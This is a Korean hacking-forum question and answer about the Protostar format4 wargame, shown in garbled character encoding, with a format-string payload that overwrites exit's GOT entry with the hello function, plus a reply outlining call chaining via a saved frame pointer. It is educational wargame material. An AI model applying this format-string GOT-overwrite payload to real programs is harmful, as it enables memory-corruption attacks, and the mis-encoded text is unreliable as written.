½Ã½ºÅÛ ÇØÅ·

 1574, 6/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tkakr7458
   format string bug + got overwite

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1864 [º¹»ç]


ÈåÀ¸.. »çÁøÀ» ¸ø¿Ã·Á¼­ ¼³¸íÇϱâ Èûµå³×¿ä ¤Ð¤Ð

https://exploit-exercises.com/protostar/format4/

À§ ÁÖ¼Ò´Â ¼Ò½º À̱¸¿ä

exit ¸¦ hello À¸·Î overwite ÇÒ¶ó°í ÇÕ´Ï´Ù.

hello = 0x080484b4 ÀÌ°í
exit@got = 0x8049718 ÀÔ´Ï´Ù.

format offsetÀº 4 ÀÔ´Ï´Ù. ( "AAAA %x%x%x%x" ÇßÀ»¶§ 4 ¹ø°¿¡ ³ª¿È)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n")
                                exit@got                helleÁ¤¼ö-4

ÀÌ·±½ÄÀ¸·Î Çϸé overwite°¡ µÇ´Â°ÍÀº ¾Ë°Ú´Âµ¥ ¿¬¼ÓÇؼ­ hello¸¦ È£ÃâÇÏ´Â ¹æ¹ýÀ» ¸ô¸£°Ú½À´Ï´Ù. µµ¿ÍÁֽʼî¤Ð¤Ð
  Hit : 2377     Date : 2017/04/19 08:28


    
ÇØÄð·¯ ÀÌ ¹®Á¦ ÀÚüÀÇ Àǵµ´Â hello¸¦ Çѹø¸¸ È£ÃâÇ϶õ°Çµ¥, hello¿¡ _exitÀÌ À־ ¾îÂ÷ÇÇ hello°£´ÙÀ½¿¡ Á¾·áÇÏ°ÚÁö¸¸ ¸¸¾à¿¡ ¾ø´Â »óȲ¿¡¼­ ¿¬¼ÓÇؼ­ È£ÃâÇÏ´Â ¹æ¹ýÀº ½ºÅÃÀ» µ¤¾î¾ß ÇÕ´Ï´Ù
exitÇÔ¼öÀÇ GOT¸¦ ÀÎÀÚ 1À» ¹Þ¾Æµµ Á¤»óÁøÇàÇÏ´Â ÇÔ¼ö ¿¹¸¦µé¾î execve·Î µ¤°í(execve´Â ÀÎÀÚ°¡ À߸øµÇµµ ÇÁ·Î±×·¥ÀÌ Á¾·áµÇÁö ¾Ê½À´Ï´Ù)
±×´ÙÀ½¿¡ sfpÀÇ Æ÷ÀÎÅ͸¦ ã½À´Ï´Ù, Áï mainÇÔ¼öÀÇ sfp¸¦ vulnÇÔ¼öÀÇ sfp°¡ °¡¸£Å°°í ÀÖÀ¸´Ï vulnÇÔ¼öÀÇ sfp¿¡ %nÀ¸·Î ÁÖ¼Ò¸¦ µ¤¾î¼­ mainÇÔ¼öÀÇ retºÎÅÍ Âß ÆäÀ̷ε带 fsb·Î µ¤À¸¸é fsb·Îµµ call chainingÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù		 2017/04/20  
ÇØÄð·¯ http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20  
tkakr7458 °¨»çÇÕ´Ï´Ù. ¤Ð¤Ð 2017/04/20  
1474   uaf Ãë¾àÁ¡ ,¸Þ¸ð¸® ¸¯ °ü·Ã ¹®Á¦[2]     pkdo1030
 07/15 2423
1473   r0pbabay ¸¦ Ǫ´Âµ¥....[1]     ewqqw
 07/07 1934
1472   ½Ã½ºÅÛ ÇØÅ·°­Á 21°­ºÎÅÍ ÀÚ·á ºÎŹµå·Áµµ µÉ±î¿ä?     sexissports
 06/23 2398
1471   c¾ð¾î ÇÔ¼ö Á¤ÀÇÁß¿¡...     vngkv123
 06/20 2106
1470   checksec, ELF±â´É, ±×¿Ü Áú¹®....     vngkv123
 06/14 2238
1469   pwnable°ú ½ÇÀü ½Ã½ºÅÛ ÇØÅ·ÀÇ Â÷ÀÌ[2]     choboKing
 06/11 4365
1468   ret2kernel32? (À©µµ¿ì ret2libc)[3]     choboKing
 06/11 2135
1467   ulimit -f °ü·ÃÇÏ¿© Áú¹®µå·Áº¾´Ï´ç     vngkv123
 06/01 2060
1466   ½©Äڵ带 ÀÌ¿ëÇؼ­ bof ¸¦ ÇÒ¶§[4]     tkakr7458
 05/22 2554
1465   unlink¸ÅÅ©·Î¿¡¼­ P....[5]     vngkv123
 05/12 2227
1464   heap¿¡¼­ unsafe unlink°¡ Á¶±Ý ÀÌÇØ°¡ ¾ÈµÇ³×¿ë ¤Ð[6]     vngkv123
 05/10 3954
1463   heap¿¡¼­ bin°ü·Ã[3]     vngkv123
 04/30 2382
1462   codegate nuclear¹®Á¦ Áß libc leakÁú¹®..[3]     vngkv123
 04/27 3045
1461   fgetsÇÔ¼ö¸¦ ÀÌ¿ëÇÑ ¹öÆÛ¿À¹öÇ÷ο젠   ewqqw
 04/23 3792
1460   format string ¹öÆÛ¿À¹öÇ÷ο젠   ewqqw
 04/22 2063
1459   angry_doraemon°°Àº ¹®Á¦ ·ÎÄõî·Ï..     vngkv123
 04/22 2449
1458   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã[1]     ewqqw
 04/21 2194
1457   ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ü·Ã[2]     ewqqw
 04/20 2136
  format string bug + got overwite[3]     tkakr7458
 04/19 2376
1455   python z3....[2]     vngkv123
 04/19 3030
[1][2][3][4][5] 6 [7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org